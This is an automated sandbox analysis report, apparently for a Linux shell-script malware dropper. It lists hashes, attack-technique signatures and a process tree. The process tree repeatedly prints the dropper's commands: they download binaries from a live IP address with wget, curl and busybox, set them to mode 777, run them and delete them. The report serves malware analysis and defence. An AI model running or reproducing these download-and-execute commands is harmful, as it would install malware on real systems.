Analysis
-
max time kernel
20s -
max time network
131s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
28/10/2024, 02:45
Static task
static1
Behavioral task
behavioral1
Sample
7463e8056474aaf11d48314134cd8520144395dd1aaf693b466bbc79c0b8ea17.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
7463e8056474aaf11d48314134cd8520144395dd1aaf693b466bbc79c0b8ea17.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
7463e8056474aaf11d48314134cd8520144395dd1aaf693b466bbc79c0b8ea17.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
7463e8056474aaf11d48314134cd8520144395dd1aaf693b466bbc79c0b8ea17.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
7463e8056474aaf11d48314134cd8520144395dd1aaf693b466bbc79c0b8ea17.sh
-
Size
10KB
-
MD5
213cb7829c8f2673d0e3a75ed6639e13
-
SHA1
3daec954fef9c3751e7ce17a5d90672ccaf98608
-
SHA256
7463e8056474aaf11d48314134cd8520144395dd1aaf693b466bbc79c0b8ea17
-
SHA512
b8be68bfce37af24db9820d6960f1a66a43e4822dff463d9d5a485644d38ba72c7556113c1f4884d0c87fbf4bf318833208844059dcbb8b998dc6cf8e29554c4
-
SSDEEP
192:UouKo0b2Oyw0Iz0sbES+ssW5dw/3vUfDp5dw/3jrS+sFfDzPo0b2Ov0Iz0sl:UoGw0Iz0sbES+ssW5dw/3m5dw/3nS+s/
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1576 chmod 1606 chmod 1642 chmod 1666 chmod 1654 chmod 1612 chmod 1528 chmod 1564 chmod 1570 chmod 1594 chmod 1660 chmod 1546 chmod 1552 chmod 1558 chmod 1582 chmod 1684 chmod 1690 chmod 1534 chmod 1618 chmod 1636 chmod 1648 chmod 1600 chmod 1672 chmod 1678 chmod 1540 chmod 1588 chmod 1624 chmod 1630 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB 1529 r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB /tmp/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM 1535 9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM /tmp/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne 1541 eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne /tmp/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI 1547 O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI /tmp/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy 1553 eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy /tmp/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H 1559 QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H /tmp/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ7 1565 rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ7 /tmp/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn 1571 GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn /tmp/MZGoABrnYnFu8Xp27oQs69simaihhOZfI7 1577 MZGoABrnYnFu8Xp27oQs69simaihhOZfI7 /tmp/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg9 1583 LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg9 /tmp/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v7 1589 1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v7 /tmp/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj 1595 zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj /tmp/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn 1601 TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn /tmp/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD0 1607 GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD0 /tmp/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj 1613 zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj /tmp/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn 1619 TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn /tmp/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg9 1625 LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg9 /tmp/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v7 1631 1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v7 /tmp/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD0 1637 GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD0 /tmp/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne 1643 eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne /tmp/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB 1649 r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB /tmp/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM 1655 9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM /tmp/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ7 1661 rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ7 /tmp/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn 1667 GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn /tmp/MZGoABrnYnFu8Xp27oQs69simaihhOZfI7 1673 MZGoABrnYnFu8Xp27oQs69simaihhOZfI7 /tmp/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI 1679 O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI /tmp/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy 1685 eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy /tmp/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H 1691 QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H -
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1597 wget 1599 busybox 1601 TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn 1615 wget 1620 rm 1598 curl 1602 rm 1616 curl 1617 busybox 1619 TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn curl File opened for modification /tmp/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg9 curl File opened for modification /tmp/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD0 curl File opened for modification /tmp/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy curl File opened for modification /tmp/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg9 curl File opened for modification /tmp/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v7 curl File opened for modification /tmp/MZGoABrnYnFu8Xp27oQs69simaihhOZfI7 curl File opened for modification /tmp/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn curl File opened for modification /tmp/MZGoABrnYnFu8Xp27oQs69simaihhOZfI7 curl File opened for modification /tmp/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy curl File opened for modification /tmp/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ7 curl File opened for modification /tmp/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v7 curl File opened for modification /tmp/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI curl File opened for modification /tmp/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H curl File opened for modification /tmp/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI curl File opened for modification /tmp/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn curl File opened for modification /tmp/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne curl File opened for modification /tmp/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ7 curl File opened for modification /tmp/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB curl File opened for modification /tmp/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn curl File opened for modification /tmp/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne curl File opened for modification /tmp/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj curl File opened for modification /tmp/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj curl File opened for modification /tmp/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB curl File opened for modification /tmp/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H curl File opened for modification /tmp/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD0 curl File opened for modification /tmp/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM curl File opened for modification /tmp/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM curl
Processes
-
/tmp/7463e8056474aaf11d48314134cd8520144395dd1aaf693b466bbc79c0b8ea17.sh/tmp/7463e8056474aaf11d48314134cd8520144395dd1aaf693b466bbc79c0b8ea17.sh1⤵PID:1520
-
/bin/rm/bin/rm bins.sh2⤵PID:1521
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵PID:1522
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵
- Writes file to tmp directory
PID:1523
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵PID:1527
-
-
/bin/chmodchmod 777 r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵
- File and Directory Permissions Modification
PID:1528
-
-
/tmp/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB./r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵
- Executes dropped EXE
PID:1529
-
-
/bin/rmrm r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵PID:1530
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵PID:1531
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵
- Writes file to tmp directory
PID:1532
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵PID:1533
-
-
/bin/chmodchmod 777 9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵
- File and Directory Permissions Modification
PID:1534
-
-
/tmp/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM./9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵
- Executes dropped EXE
PID:1535
-
-
/bin/rmrm 9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵PID:1536
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵PID:1537
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵
- Writes file to tmp directory
PID:1538
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵PID:1539
-
-
/bin/chmodchmod 777 eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵
- File and Directory Permissions Modification
PID:1540
-
-
/tmp/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne./eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵
- Executes dropped EXE
PID:1541
-
-
/bin/rmrm eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵PID:1542
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵PID:1543
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵
- Writes file to tmp directory
PID:1544
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵PID:1545
-
-
/bin/chmodchmod 777 O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵
- File and Directory Permissions Modification
PID:1546
-
-
/tmp/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI./O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵
- Executes dropped EXE
PID:1547
-
-
/bin/rmrm O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵PID:1548
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵PID:1549
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵
- Writes file to tmp directory
PID:1550
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵PID:1551
-
-
/bin/chmodchmod 777 eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵
- File and Directory Permissions Modification
PID:1552
-
-
/tmp/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy./eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵
- Executes dropped EXE
PID:1553
-
-
/bin/rmrm eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵PID:1554
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵PID:1555
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵
- Writes file to tmp directory
PID:1556
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵PID:1557
-
-
/bin/chmodchmod 777 QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵
- File and Directory Permissions Modification
PID:1558
-
-
/tmp/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H./QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵
- Executes dropped EXE
PID:1559
-
-
/bin/rmrm QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵PID:1560
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵PID:1561
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵
- Writes file to tmp directory
PID:1562
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵PID:1563
-
-
/bin/chmodchmod 777 rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵
- File and Directory Permissions Modification
PID:1564
-
-
/tmp/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ7./rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵
- Executes dropped EXE
PID:1565
-
-
/bin/rmrm rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵PID:1566
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵PID:1567
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵
- Writes file to tmp directory
PID:1568
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵PID:1569
-
-
/bin/chmodchmod 777 GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵
- File and Directory Permissions Modification
PID:1570
-
-
/tmp/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn./GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵
- Executes dropped EXE
PID:1571
-
-
/bin/rmrm GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵PID:1572
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵PID:1573
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵
- Writes file to tmp directory
PID:1574
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵PID:1575
-
-
/bin/chmodchmod 777 MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵
- File and Directory Permissions Modification
PID:1576
-
-
/tmp/MZGoABrnYnFu8Xp27oQs69simaihhOZfI7./MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵
- Executes dropped EXE
PID:1577
-
-
/bin/rmrm MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵PID:1578
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵PID:1579
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵
- Writes file to tmp directory
PID:1580
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵PID:1581
-
-
/bin/chmodchmod 777 LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵
- File and Directory Permissions Modification
PID:1582
-
-
/tmp/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg9./LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵
- Executes dropped EXE
PID:1583
-
-
/bin/rmrm LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵PID:1584
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵PID:1585
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵
- Writes file to tmp directory
PID:1586
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵PID:1587
-
-
/bin/chmodchmod 777 1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵
- File and Directory Permissions Modification
PID:1588
-
-
/tmp/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v7./1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵
- Executes dropped EXE
PID:1589
-
-
/bin/rmrm 1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵PID:1590
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵PID:1591
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵
- Writes file to tmp directory
PID:1592
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵PID:1593
-
-
/bin/chmodchmod 777 zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵
- File and Directory Permissions Modification
PID:1594
-
-
/tmp/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj./zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵
- Executes dropped EXE
PID:1595
-
-
/bin/rmrm zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵PID:1596
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- System Network Configuration Discovery
PID:1597
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1598
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- System Network Configuration Discovery
PID:1599
-
-
/bin/chmodchmod 777 TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- File and Directory Permissions Modification
PID:1600
-
-
/tmp/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn./TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:1601
-
-
/bin/rmrm TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- System Network Configuration Discovery
PID:1602
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵PID:1603
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵
- Writes file to tmp directory
PID:1604
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵PID:1605
-
-
/bin/chmodchmod 777 GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵
- File and Directory Permissions Modification
PID:1606
-
-
/tmp/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD0./GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵
- Executes dropped EXE
PID:1607
-
-
/bin/rmrm GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵PID:1608
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵PID:1609
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵
- Writes file to tmp directory
PID:1610
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵PID:1611
-
-
/bin/chmodchmod 777 zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵
- File and Directory Permissions Modification
PID:1612
-
-
/tmp/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj./zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵
- Executes dropped EXE
PID:1613
-
-
/bin/rmrm zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵PID:1614
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- System Network Configuration Discovery
PID:1615
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1616
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- System Network Configuration Discovery
PID:1617
-
-
/bin/chmodchmod 777 TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- File and Directory Permissions Modification
PID:1618
-
-
/tmp/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn./TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:1619
-
-
/bin/rmrm TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- System Network Configuration Discovery
PID:1620
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵PID:1621
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵
- Writes file to tmp directory
PID:1622
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵PID:1623
-
-
/bin/chmodchmod 777 LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵
- File and Directory Permissions Modification
PID:1624
-
-
/tmp/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg9./LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵
- Executes dropped EXE
PID:1625
-
-
/bin/rmrm LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵PID:1626
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵PID:1627
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵
- Writes file to tmp directory
PID:1628
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵PID:1629
-
-
/bin/chmodchmod 777 1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵
- File and Directory Permissions Modification
PID:1630
-
-
/tmp/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v7./1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵
- Executes dropped EXE
PID:1631
-
-
/bin/rmrm 1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵PID:1632
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵PID:1633
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵
- Writes file to tmp directory
PID:1634
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵PID:1635
-
-
/bin/chmodchmod 777 GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵
- File and Directory Permissions Modification
PID:1636
-
-
/tmp/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD0./GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵
- Executes dropped EXE
PID:1637
-
-
/bin/rmrm GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵PID:1638
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵PID:1639
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵
- Writes file to tmp directory
PID:1640
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵PID:1641
-
-
/bin/chmodchmod 777 eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵
- File and Directory Permissions Modification
PID:1642
-
-
/tmp/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne./eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵
- Executes dropped EXE
PID:1643
-
-
/bin/rmrm eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵PID:1644
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵PID:1645
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵
- Writes file to tmp directory
PID:1646
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵PID:1647
-
-
/bin/chmodchmod 777 r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵
- File and Directory Permissions Modification
PID:1648
-
-
/tmp/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB./r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵
- Executes dropped EXE
PID:1649
-
-
/bin/rmrm r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵PID:1650
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵PID:1651
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵
- Writes file to tmp directory
PID:1652
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵PID:1653
-
-
/bin/chmodchmod 777 9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵
- File and Directory Permissions Modification
PID:1654
-
-
/tmp/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM./9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵
- Executes dropped EXE
PID:1655
-
-
/bin/rmrm 9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵PID:1656
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵PID:1657
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵
- Writes file to tmp directory
